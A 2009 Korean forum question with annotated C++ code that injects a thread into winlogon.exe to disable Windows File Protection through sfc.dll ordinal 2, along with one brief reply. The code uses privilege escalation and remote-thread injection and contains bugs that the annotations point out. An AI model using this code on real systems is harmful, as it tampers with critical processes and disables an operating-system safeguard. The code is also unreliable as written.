CreateRemoteThread 관련 질문입니다.
글쓴이: bjgangs / 작성시간: 수, 2009/10/07 - 9:32오후
간단하게 코드를 설명하자면,
winlogon.exe 프로세스를 열어서 그안에 sfc.dll 안의 서수 2에 해당하는 함수의 내용을 인젝션 하고 실행하는 코드입니다.
디버깅을 해보면 CreateRemoteThread 함수를 실행하는 과정에서 에러가 발생합니다.
실행하면 윈도우에서 blue screen이 뜨면서 꺼지네요.
실행환경은 Windows XP sp2이구요 vc++ 6를 사용했습니다.
Windows File protection 우회방법 실습중에 발생한 문제입니다.
조언 부탁드립니다.
헤더가 보이질 않네요^^;;
따로 적겠습니다.
windows.h
tchar.h
stdio.h
tlhelp32.h
/*
 * Forum sample (reformatted from the single-line paste above; code tokens unchanged).
 *
 * Per the author's description: look up ordinal 2 of sfc.dll, enable SeDebugPrivilege,
 * find the process named on the command line, copy the bytes of exec_func() into that
 * process and start a thread on them. This is the classic remote-thread injection
 * sequence (OpenProcess -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread);
 * the comments below annotate what each step does and where it is observable, they do
 * not change the code. Note the source is C++ (try/throw/catch), not C.
 */
#define WIN32_LEAN_AND_MEAN
#define STRICT
#include <windows.h>
#include <tchar.h>
#include <stdio.h>
#include <tlhelp32.h>

// Stub that is copied verbatim into the target process. Its single argument arrives
// as the lpParameter of the remote thread (see CreateRemoteThread below) and is called
// as a no-argument function. The pragma disables the compiler's stack-check emission
// for this region; the post does not say why, so the intent is not documented here.
#pragma check_stack (off)
DWORD exec_func(FARPROC SfcTerminateWatcherThread)
{
    SfcTerminateWatcherThread();
    return 0;
}
// Marker function: its address is used as the end of exec_func() to compute the number
// of bytes to copy. NOTE(review): subtracting the addresses of two distinct functions is
// not defined by the language and only reflects exec_func's size if the linker happens to
// place the two adjacently and in this order — unverified assumption in this code.
void after_thread_func(void){}
#pragma check_stack

int adjust_privileges(void);
DWORD get_process_pid(char *);
int inject_thread(DWORD, LPVOID);

/*
 * Entry point. argv[1] is the image name of the target process.
 * Returns 1 on usage error, -1 on any failure, 0 on success.
 */
int main(int argc, char *argv[])
{
    if(argc < 2){
        printf("%s [process name]\n", argv[0]);
        return 1;
    }
    // Resolve sfc.dll export #2 in THIS process; the resulting address is later handed
    // to the remote thread unchanged. NOTE(review): that only means anything in the target
    // if the same DLL is mapped at the same base address there — not checked anywhere.
    // The LoadLibrary result is not NULL-checked before being passed to GetProcAddress.
    FARPROC pSTWT = GetProcAddress(LoadLibrary("sfc.dll"), (LPCSTR)2);
    if(pSTWT == NULL){
        printf("Error: SfcTerminateWatcherThread\n");
        return -1;
    }
    int err = 0;
    if(err = adjust_privileges()){
        printf("Error: adjust_privileges:%d\n", err);
        return -1;
    }
    DWORD dwPID;
    if((dwPID = get_process_pid(argv[1])) == 0){
        printf("Error: get_process_pid\n");
        return -1;
    }
    if(err = inject_thread(dwPID, pSTWT)){
        printf("Error: inject_thread:%d\n", err);
        return -1;
    }
    // Printed whenever inject_thread() returned 0; nothing here verifies the effect.
    printf("Windows File Protection Disabled.\n");
    return 0;
}

/*
 * Enable SeDebugPrivilege on the current process token.
 * Returns 0 on success, or 1/2/3 identifying the failing API call
 * (OpenProcessToken / LookupPrivilegeValue / AdjustTokenPrivileges).
 *
 * Defender note: enabling SeDebugPrivilege is a common precursor to cross-process
 * tampering and can be audited (privilege-use auditing) independently of what follows.
 */
int adjust_privileges(void)
{
    int ret = 0;
    HANDLE hToken = NULL;
    try{
        if( ! OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)) throw 1;
        LUID luid;
        if( ! LookupPrivilegeValue(NULL, "SeDebugPrivilege", &luid)) throw 2;
        TOKEN_PRIVILEGES tk_priv;
        tk_priv.PrivilegeCount = 1;
        tk_priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
        tk_priv.Privileges[0].Luid = luid;
        // NOTE(review): AdjustTokenPrivileges reports TRUE even when the privilege was not
        // actually assigned (GetLastError() == ERROR_NOT_ALL_ASSIGNED); that case is not
        // checked here, so it would only surface later as OpenProcess() failing.
        if( ! AdjustTokenPrivileges(hToken, FALSE, &tk_priv, 0, NULL, NULL)) throw 3;
    }catch(int err){
        ret = err;
    }
    // Reached with hToken == NULL when OpenProcessToken failed; CloseHandle(NULL) just fails.
    CloseHandle(hToken);
    return ret;
}

/*
 * Return the PID of the process whose image name equals psname (case-sensitive strcmp),
 * or 0 if the snapshot could not be taken or no process matched.
 * If several processes share the name, the LAST one enumerated wins.
 */
DWORD get_process_pid(char *psname)
{
    DWORD pid = 0;
    HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if(hSnap == INVALID_HANDLE_VALUE) return 0;
    PROCESSENTRY32 pe;
    pe.dwSize = sizeof(pe);
    BOOL bResult = Process32First(hSnap, &pe);
    while(bResult){
        if( ! strcmp(pe.szExeFile, psname)) pid = pe.th32ProcessID;
        bResult = Process32Next(hSnap, &pe);
    }
    CloseHandle(hSnap);
    return pid;
}

/*
 * Copy exec_func() into process dwPID and run it on a new thread with pfunc as its argument.
 * Returns 0 on success, or 1..5 identifying the failing step:
 *   1 OpenProcess, 2 VirtualAllocEx, 3 WriteProcessMemory, 4 CreateRemoteThread,
 *   5 the remote thread did not finish within 10 s.
 *
 * Defender note: this exact call sequence against another process, requested with
 * PROCESS_ALL_ACCESS, is the textbook remote-thread injection pattern that endpoint
 * monitoring commonly flags; nothing in it is subtle from the monitoring side.
 *
 * NOTE(review): if the injected thread faults, the target process is terminated; when
 * the target is a critical system process that takes the whole system down, which is
 * consistent with the blue screen the author reports — inference, not shown by the code.
 */
int inject_thread(DWORD dwPID, LPVOID pfunc)
{
    int ret = 0;
    HANDLE hProcess = NULL;
    LPVOID remote_mem = NULL;
    try{
        if((hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID)) == NULL) throw 1;
        // Size = distance between the two function addresses (see the note on after_thread_func).
        remote_mem = VirtualAllocEx(hProcess, NULL, (SIZE_T)((char *)after_thread_func - (char *)exec_func), MEM_COMMIT, PAGE_READWRITE);
        if(remote_mem == NULL) throw 2;
        BOOL wFlag = WriteProcessMemory(hProcess, remote_mem, (char *)exec_func, (SIZE_T)((char *)after_thread_func - (char *)exec_func), (SIZE_T *)0);
        if(wFlag == FALSE) throw 3;
        // The thread starts at the copied bytes; pfunc becomes exec_func's argument.
        HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)remote_mem, pfunc, 0, NULL);
        if(hThread == NULL) throw 4;
        // NOTE(review): on timeout hThread is never closed (handle leak), and the catch
        // below then releases remote_mem while that thread may still be running in it.
        if(WaitForSingleObject(hThread, 10 * 1000) == WAIT_TIMEOUT) throw 5;
        CloseHandle(hThread);
    }catch(int err){
        // err <= 2: nothing was allocated in the target, so nothing to release.
        if(err > 2) VirtualFreeEx(hProcess, remote_mem, 0, MEM_RELEASE);
        ret = err;
    }
    CloseHandle(hProcess);
    return ret;
}
흠...
winlogon.exe를 dll injection하면 blue screen까지 뜨나요? 놀랍군요.
그런데 제가 읽었던 Jeffrey Richter 책의 내용과는 안 맞는 부분이 많은 것 같네요.